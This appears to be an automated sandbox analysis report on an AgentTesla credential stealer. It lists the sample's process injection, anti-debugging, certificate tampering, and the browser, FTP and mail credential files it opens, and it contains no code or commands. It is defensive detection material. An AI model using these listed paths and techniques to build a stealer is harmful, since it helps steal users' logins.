Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Code function: 6_2_00403918 LdrInitializeThunk,

6_2_00403918

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Memory written: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Queries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Queries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
Source: Yara match	File source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini			Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Source: Yara match	File source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
Source: Yara match	File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
Source: Yara match	File source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE